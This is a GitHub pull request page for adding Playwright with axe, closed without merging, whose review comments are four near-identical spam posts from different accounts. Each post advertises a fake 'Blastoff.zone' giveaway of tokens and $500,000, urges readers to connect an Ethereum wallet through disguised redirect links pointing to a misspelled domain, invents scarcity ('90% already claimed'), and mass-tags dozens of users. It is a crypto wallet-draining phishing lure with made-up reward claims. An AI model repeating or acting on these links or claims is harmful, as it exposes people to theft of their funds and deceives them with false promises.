### PR TITLE
Add playwright with axe

### PR DESCRIPTION
**Pull request by mutablestate**

### CODE REVIEW

**Comment by sobin007** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
shreyakupadhyay, @rovast, @pixelomo, @takeakiyamasaki, @ayvanov, @TomFisherman, @medaminefh, @lucaslimapoa, @ebankie, @1Bittium, @suliyea, @DKFM, @rogepi, @ArnaudFavier, @SuchenRajawat, @KimKyungup, @ESITtycqj, @sunui, @chrissyjai, @youniaogu, @BahlulHasanli, @omar-dulaimi, @imminist, @josemb12, @ron-zhong, @arunpraba, @kurama3322, @christophercr, @Forexin, @cklwblove, @NEA-cloud2, @qhxin, @fzzle, @MaximeSarrato, @19890843006, @ivnnv, @nickatnight, @dungkv1308, @githubxiaoyuan, @Schlomoh, @merRen22, @wojckr, @mcabrams, @jeasonstudio, @Thibaut-Fontaine, @francelwebdev, @your-local-developer, @Pakinwet, @IgorColetoBueno, @ariaseta

**Comment by phieule2024** [comment]
[Banner](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
lizhiyu-me, @Andro-Emad, @squareaxis, @KoreSamuel, @wwarami, @fecony, @aeharvlee, @yeahsathish, @j3achen, @EmanuelJrc, @LeoRami99, @0xYondaime, @YouJob, @ali-ghn, @chiefman1, @Jurshsmith, @kgbrah, @emanuelebarbato, @azl397985856, @flooki10, @fltenwall, @czarekphone, @0000marcell, @armsomboon1, @yhm-amber, @prollinson, @pragkent, @TuDo1403, @phirojshah, @fonmrly, @virtrix, @phyBrackets, @mchtilianov, @chrisehlee, @SerekKiri, @ahayder, @ekader, @grievousii, @RussQuan, @airan04, @adityasaxena, @Wenzhi-Ding, @danwagnerco, @elllot, @yeremiavictor, @constAlex, @depcorn, @regisfoucault, @denisglotov, @danielkaczmarczyk

**Comment by masa2el** [comment]
[Banner](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
fenske, @thegitparticle, @gabespace, @health901, @rutkat, @spaksa, @utkutugrul, @loganbek, @e5pecial, @Morafix, @ryantang910, @Draichi, @Picnic6868778, @jeffersonbenson, @josephkb87, @dbensik, @sergera, @ASchmidt1024, @siwarbrick, @jeffreyplumber, @geeeekegeeeeke, @Joran-Dob, @masterdxy, @zhangxuanru, @morristech, @St0nersdash, @BOGdane8, @ahsanwtc, @TheDeveloperFarm, @dbarobin, @Looxor, @john523, @yasseripio, @cpopov, @ethnik-eth, @gmf001, @lotogus, @liliccc, @bhalla98, @supermarvin101, @giboooo, @italanchan, @Astraioss, @ramvi, @d33pfri3d, @mskobe, @P233, @hskang9, @ramazangur, @naftalimurgor

**Comment by masa2el** [comment]
[Banner](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
RickVM, @realknown, @shubhamdusane, @Namaskar-1F64F, @pax-k, @r0x83, @roo-shy, @oz1127, @Gerda5868, @Kaleb47, @xuqzab, @Dickens-odera, @Seal501, @bmiller59, @ECJ222, @polea003, @4th-turning, @gustavobio, @paolomarin, @Stormix, @0xCourtney, @rjoshima, @play1895, @mutablestate, @natzuu, @Djdriver, @pankajanand26, @karmaton, @algovenus, @technologyinvestor, @SKALE-jace, @imvahid, @arobbins, @danielmcclure, @a-hagi613, @losdwind, @MarkuYasni, @nining, @dylanjmcdonald, @kkhujamov, @0xBigBoss, @a07z, @saurabh-commit, @LongShao007, @yusukesato06, @ChrisThomasCDC, @0xBadMad, @cromatikap, @cavb, @noliveira95

**Pull request closed without merging**
